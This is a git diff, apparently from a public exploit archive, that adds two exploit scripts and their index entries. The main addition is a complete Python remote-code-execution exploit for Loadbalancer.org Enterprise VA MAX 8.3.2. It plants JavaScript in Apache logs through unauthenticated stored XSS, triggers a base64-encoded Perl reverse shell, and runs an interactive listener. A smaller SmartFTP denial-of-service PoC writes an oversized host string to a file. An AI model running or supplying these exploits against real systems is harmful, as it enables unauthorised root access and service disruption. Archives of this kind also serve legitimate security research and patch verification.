diff --git a/exploits/php/webapps/45758.py b/exploits/php/webapps/45758.py new file mode 100755 index 000000000..98f22f9f5 --- /dev/null +++ b/exploits/php/webapps/45758.py @@ -0,0 +1,97 @@ +# Exploit Title: Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution +# Date: 2018-07-24 +# Exploit Authors: Jakub Palaczynski +# Vendor Homepage: https://www.loadbalancer.org/ +# Version: <= 8.3.2 +# CVE: N/A + +# Exploit Description: Loadbalancer.org Enterprise VA MAX - Remote Code Execution via Unauthenticated Stored XSS +# Info: It is advised to use HTTPS port instead of HTTP for sending payloads as storing JavaScript in "Apache Error Log" does not work for HTTP. +# Info: JavaScript can be easily changed to for example modify SSH configuration or add/modify web users + +# Basic Information: +# Two instances of Stored XSS were found - exploit uses both: +# 1. It is possible to inject custom JavaScript code during authentication to "/lbadmin/". +# Application takes input from Basic Auth (username) and stores it without encoding/sanitization/filtering in "Apache Error Log". +# This instance only forks for HTTPS. +# 2. It is possible to inject custom JavaScript code by accessing URL like /?. +# Such JavaScript is stored in "Apache User Log". + +# This way attacker can store JavaScript code that can for example execute system command as root. This is actually what this exploit does - spawns reverse shell. +# When application user browses "Apache Error Log" or "Apache User Log" custom JavaScript code gets automatically executed. + + +#!/usr/bin/python + +import socket +import sys +import os +import threading +import subprocess +import time +import base64 + +# print help or assign arguments +if len(sys.argv) != 3: + sys.stderr.write("[-]Usage: python %s \n" % sys.argv[0]) + sys.stderr.write("[-]Exemple: python %s 192.168.1.1:80 https://192.168.1.2:9443\n" % sys.argv[0]) + sys.exit(1) + +lhost = sys.argv[1] # our ip address and port +rhost = sys.argv[2] # ip address and port of vulnerable Loadbalancer +raw = """perl -e 'use Socket;$i=\"""" + lhost.split(":")[0] + """\";$p=""" + lhost.split(":")[1] + """;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" # raw reverse shell in perl +payload_url = 'document.getElementById("lb").contentDocument.forms[0].elements["command"].value = "echo ' + base64.b64encode(raw.encode("ascii")) + ' | base64 -d | bash";document.getElementById("lb").contentDocument.forms[0].submit();' # base64 encoded reverse shell in perl +payload_auth = ":pwd" # base64 encoded reverse shell in perl + +# for additional thread to send request in parallel +class requests (threading.Thread): + def run(self): + time.sleep(5) + # send requests to trigger vulnerability + os.system('curl -s -k -m 10 -X "GET" -H "Authorization: Basic ' + base64.b64encode(payload_auth.encode("ascii")) + '" "' + rhost + '/lbadmin/" > /dev/null') # store payload in Apache Error logs + os.system('curl -s -k -m 10 -X "GET" "' + rhost + '/?" > /dev/null') # store payload in Apache User logs + +# for additional thread to receive data from socket +class receiving (threading.Thread): + def __init__(self, conn): + threading.Thread.__init__(self) + self.conn = conn + self._is_running = True + def stop(self): + self._is_running = False + def run(self): + while (self._is_running): + cmd = conn.recv(1024) + sys.stdout.write(cmd) + sys.stdout.flush() + if cmd == '': + break + threadr.stop() + +# function that creates socket +def create_socket(port): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(('0.0.0.0', port)) + sock.listen(10) + conn, addr = sock.accept() + return sock, conn, addr + +# start thread that sends request +print 'Sending requests that triggers vulnerability.' +thread = requests() +thread.start() + +# create socket to receive shell +print 'Now you need to wait for shell.' +sock, conn, addr = create_socket(int(lhost.split(":")[1])) +threadr = receiving(conn) +threadr.start() +while True: + cmd = raw_input("") + if cmd == 'exit': + conn.send(cmd + "\n") + break + else: + conn.send(cmd + "\n") +sock.close() \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45759.py b/exploits/windows_x86-64/dos/45759.py new file mode 100755 index 000000000..1d484810a --- /dev/null +++ b/exploits/windows_x86-64/dos/45759.py @@ -0,0 +1,21 @@ +#Exploit Title: SmartFTP Client 9.0.2615.0 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2018-10-30 +#Vendor Homepage: https://www.smartftp.com/en-us/ +#Software Link: https://www.smartftp.com/en-us/download +#Tested Version: 9.0.2615.0 +#Tested on: Windows 10 Single Language x64 + +#Steps to produce the crash: +#1.- Run python code: SmartFTP_9.0.2615.0_Denial_of_Service_(PoC).py +#2.- Open network.txt and copy content to clipboard +#2.- Open SmartFTP Client +#3.- Select Connection +#4.- Paste ClipBoard on "Host" +#5.- Crashed + +cod = "\x41" * 300 + +f = open('network.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e0c3d7e86..74d0c71c5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6168,6 +6168,7 @@ id,file,description,date,author,type,platform,port 45746,exploits/hardware/dos/45746.php,"ZyXEL VMG3312-B10B < 1.00(AAPP.7) - Credential Disclosure",2018-10-30,"numan türle",dos,hardware,21 45749,exploits/windows/dos/45749.py,"QNAP NetBak Replicator 4.5.6.0607 - Denial of Service (PoC)",2018-10-30,"Yair Rodríguez Aparicio",dos,windows, 45750,exploits/linux/dos/45750.txt,"SIPp 3.3.990 - Local Buffer Overflow (PoC)",2018-10-30,"Nawaf Alkeraithe",dos,linux, +45759,exploits/windows_x86-64/dos/45759.py,"SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)",2018-10-31,"Victor Mondragón",dos,windows_x86-64, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -40267,3 +40268,4 @@ id,file,description,date,author,type,platform,port 45755,exploits/jsp/webapps/45755.txt,"Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal",2018-10-30,"Rafael Pedrero",webapps,jsp,80 45756,exploits/php/webapps/45756.txt,"Asaancart Simple PHP Shopping Cart 0.9 - Arbitrary File Upload / SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80 45757,exploits/php/webapps/45757.txt,"CI User Login and Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80 +45758,exploits/php/webapps/45758.py,"Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution",2018-10-31,"Jakub Palaczynski",webapps,php,